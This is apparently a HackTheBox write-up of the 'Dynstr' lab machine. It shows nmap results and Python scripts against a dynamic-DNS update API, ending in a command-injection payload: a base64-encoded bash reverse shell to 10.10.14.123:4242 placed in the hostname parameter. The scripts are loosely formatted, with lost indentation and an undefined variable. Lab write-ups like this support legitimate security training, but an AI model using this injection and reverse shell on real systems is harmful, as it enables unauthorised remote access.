HackTheBox - Dynstr
Prompt: https://app.hackthebox.eu/machines/dynstr
So first of all we run an nmap scan and get the open ports.
22/tcp open ssh
53/tcp open domain
80/tcp open http
We visit port 80 in our browser and discover the following information:
We referred to these web-pages (documentation was scarce):
Remote Access API Dnsomatic docs
However, when sending a valid request via browser,we always got the badauth error. So we tried to do it via a script:
import requests, socket
username = ""
password = ""
hostname = "" # your domain name hosted in no-ip.com
# Gets the current public IP of the host machine.
#myip = requests.get('http://api.ipify.org').text
# Gets the existing dns ip pointing to the hostname.
#old_ip = socket.gethostbyname(hostname)
# Noip API - dynamic DNS update.
# https://www.noip.com/integrate/request.
def update_dns(username,password):
r = requests.get(f"http://{username}:{password}@dyna.htb/nic/update")
#if r.status_code != requests.codes.ok:
# Update only when ip is different.
#if myip != old_ip:
#update_dns(username, password )
And we finally saw this message on running the script:
On further enumeration we saw that hostname parameter was had command injection so we tried to take advantage of it by sending a reverse shell in base64 and listening on another terminal with netcat. Here’s our script for that:
import requests, socket
username = "dynadns"
password = "sndanyd"
hostname = "aa.dnsalias.htb" # your domain name hosted in no-ip.com
# Gets the current public IP of the host machine.
#myip = requests.get('http://api.ipify.org').text
# Gets the existing dns ip pointing to the hostname.
#old_ip = socket.gethostbyname(hostname)
# Noip API - dynamic DNS update.
# https://www.noip.com/integrate/request.
def update_dns(username,password):
r = requests.get(f"http://{username}:{password}@dyna.htb/nic/update?hostname=`echo YmFzaCAtaSAmPi9kZXYvdGNwLzEwLjEwLjE0LjEyMy80MjQyIDwmMQ==| base64 -d | bash`\"{hostname}&my={ip}")
#if r.status_code != requests.codes.ok:
# Update only when ip is different.
#if myip != old_ip:
#update_dns(username, password )
And we get the reverse shell in our terminal !!